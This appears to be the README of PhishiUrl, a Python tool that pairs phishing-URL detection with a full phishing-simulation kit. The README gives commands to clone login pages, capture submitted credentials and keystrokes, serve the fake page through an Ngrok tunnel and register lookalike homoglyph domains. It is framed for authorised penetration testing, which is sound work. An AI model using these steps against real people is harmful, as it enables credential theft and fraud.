PhishiUrl is a powerful tool for detecting and simulating phishing attacks, designed to assist cybersecurity professionals and penetration testers in identifying and mitigating vulnerabilities. With a variety of features, including homoglyph URL generation, website cloning, and URL security analysis, this tool is built for ethical security testing.

A related article: PDF

Current Version: 1.3.0
Author: Emad
GitHub Repository: github.com/EmadYaY/PhishiUrl

Using this tool for illegal purposes, such as stealing data or conducting real phishing attacks, is strictly prohibited. PhishiUrl is intended solely for legal penetration testing with explicit permission from the website owner. Any unauthorized use is the user's responsibility.

• Identifies Unicode homoglyph characters in URLs (Cyrillic, Greek, etc.)
• Detects ASCII character substitutions used for brand impersonation (e.g., faceb00k → facebook, paypa1 → paypal)
• Detects suspicious keywords (e.g., login, verify, secure)
• Integrates with VirusTotal and PhishTank APIs for URL security analysis

• Suggests homoglyph domains by replacing characters with Unicode lookalikes (e.g., o with о)
• Checks domain availability using WHOIS

• Clones web pages by downloading resources (HTML, CSS, JS, images)
• --download-js option to download JavaScript files
• --download-all option to download all assets (images, fonts, etc.)
• Preserves SPA asset directory structure (e.g., /assets/)
• Captures user input data (e.g., username, password) upon form submission
• Automatically redirects to the original domain after capturing data

• Displays the original site in an iframe while capturing user data silently
• --use-iframe option to enable iframe mode instead of cloning
• Keylogging support via /keylog endpoint

• Creates a tunnel with Ngrok for remote access to the fake page
• Generates a QR code for quick access to the tunnel URL

• Modifies the system hosts file to map homoglyph domains locally
• Works on Windows (requires Administrator), Linux and macOS (requires sudo)

• Generates detailed reports for URL analysis and captured data in report.json and credentials.txt
• Optional keylogging data saved in keylog.txt (in iframe mode)

• Python 3.7 or higher
• Google Chrome (for Selenium-based DOM enrichment)
• Dependencies:

  pip install click rich requests pyngrok python-whois qrcode beautifulsoup4 lxml selenium webdriver-manager
  

• On Windows only: pip install pywin32
• Ngrok Token: For tunneling (add to config.json)
• VirusTotal API Key: For URL analysis (optional, add to config.json)
• PhishTank API Key: For PhishTank lookups (free at phishtank.org, add to config.json)

1. Clone the repository:

   git clone https://github.com/EmadYaY/PhishiUrl.git
   cd PhishiUrl

2. Create and activate a virtual environment:

   python -m venv venv
   source venv/bin/activate        # Linux/Mac
   venv\Scripts\activate           # Windows CMD
   .\venv\Scripts\Activate.ps1     # Windows PowerShell

   PowerShell error? Run: Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

3. Install the dependencies:

   pip install .

   Bash/Zsh error? Run: pip install . --break-system-packages --force-reinstall --no-cache-dir --ignore-installed PyYAML If you don't want to use venv: --break-system-packages

4. Configure config.json:

   {
       "ngrok_token": "YOUR_NGROK_TOKEN",
       "virustotal_api_key": "YOUR_VIRUSTOTAL_API_KEY",
       "phishtank_api_key": "YOUR_PHISHTANK_API_KEY",
       "templates_path": "./templates"
   }

   VirusTotal API key: Sign up at virustotal.com → Profile → API key (free tier available)
   PhishTank API key: Register at phishtank.org (free)

Detect suspicious URLs using homoglyphs, brand impersonation, keywords, and external APIs.

phishiurl check --url faceb00k.com

With a file (one URL per line, UTF-8 encoded):

phishiurl check --file urls.txt --output results.json

Tunnel a phishing page with Ngrok and start a local server.

phishiurl tunnel --port 8080 --template instagram_login.html --use-ngrok

Generate similar domains using homoglyph characters.

phishiurl suggest --domain google.com --check-availability

Analyze a URL using VirusTotal or PhishTank.

phishiurl api_check --url faceb00k.com --service virustotal
phishiurl api_check --url faceb00k.com --service phishtank

Clone a website, use local files, or display in an iframe, capture user data, and serve it locally or remotely.

Clone with all assets:

phishiurl clone --url https://domain.tld/login --port 8080 --use-ngrok --download-js --download-all

Use iframe mode:

phishiurl clone --url https://domain.tld/login --port 8080 --use-ngrok --use-iframe

Clone from local files:

phishiurl clone --local-folder ./my_website --port 8080

phishiurl help

phishiurl check --url "faceb00k.com/login"
# Expected: PHISHING (score ≥ 70) — brand impersonation detected

phishiurl check --url "google.com"
# Expected: SAFE (score = 0)

With a file (create with UTF-8 encoding):

# Windows PowerShell
"faceb00k.com`ngoogle.com`npaypa1.com/verify" | Out-File -Encoding utf8 urls.txt
phishiurl check --file urls.txt --output results.json

1. Open a terminal with Administrator privileges (Windows) or use sudo (Linux/Mac)

2. Run the clone command:

   phishiurl clone --url https://domain.tld/login/ --port 8080 --download-js --download-all

3. Open browser at http://localhost:8080

4. Submit the form — credentials should be saved in:

   templates/cloned/domain_tld/credentials.txt
   

phishiurl clone --url https://domain.tld/login/ --port 8080 --use-iframe

• The page displays the original site in an iframe
• Keystrokes are captured in keylog.txt

phishiurl suggest --domain google.com --check-availability

Expected output includes domains like gооgle.com (Cyrillic о) with WHOIS availability status.

PhishiUrl v1.3.0 uses a multi-layer detection system:

URLs with score ≥ 60 are classified as PHISHING.

• Integrate with goclone for faster and more accurate website cloning
• Fix issues with loading dynamic resources (e.g., external APIs)

• Add detection for security headers (e.g., X-Frame-Options) to flag protected sites
• Integrate with tools like Spoofy for DNS/email vulnerability analysis

• Visual reports using Matplotlib
• Statistical analysis (e.g., number of successful phishing attempts)

• Customizable iframe appearance (fake headers, favicon)

• Real-time keylogging with enable/disable toggle

• Integrate with Telepathy for Telegram-based phishing analysis

• Nginx-based reverse proxy to bypass iframe restrictions

• DLP Toolbox: Test Data Loss Prevention policies alongside phishing simulations
• Email Spoof Test: Test email security and simulate email phishing attacks

We welcome contributions! To report bugs, suggest features, or submit a pull request:

1. Fork the repository: github.com/EmadYaY/PhishiUrl
2. Make your changes and submit a pull request
3. Use GitHub Issues for bug reports and feature requests

• Cross-platform support: Now works on Linux and macOS (not Windows-only)
• Improved detection engine: Brand impersonation detection (faceb00k → facebook, paypa1 → paypal, etc.)
• Fixed: check --file Unicode/encoding error (UTF-16 BOM from PowerShell)
• Fixed: SPA asset path structure preserved during cloning (/assets/ subdirectory)
• Fixed: VirusTotal API upgraded to v3, with submit-then-poll flow for free tier
• Fixed: PhishTank now requires API key — clear error message provided
• Fixed: suggest command no longer produces duplicate rows
• Fixed: BeautifulSoup new_tag() name conflict crash
• Added: --use-iframe flag on clone command
• Added: /keylog endpoint for iframe keylogging
• Added: Automatic ChromeDriver management via webdriver-manager
• Improved: Server output with Rich panels and cleaner logging

• Added --download-all option to download all assets
• Added iframe mode with --use-iframe option
• Data capture only on form submission
• Improved handling of downloaded resource paths

• Added initial cloning functionality and Ngrok integration

This project is licensed under the MIT License. See the LICENSE file for details.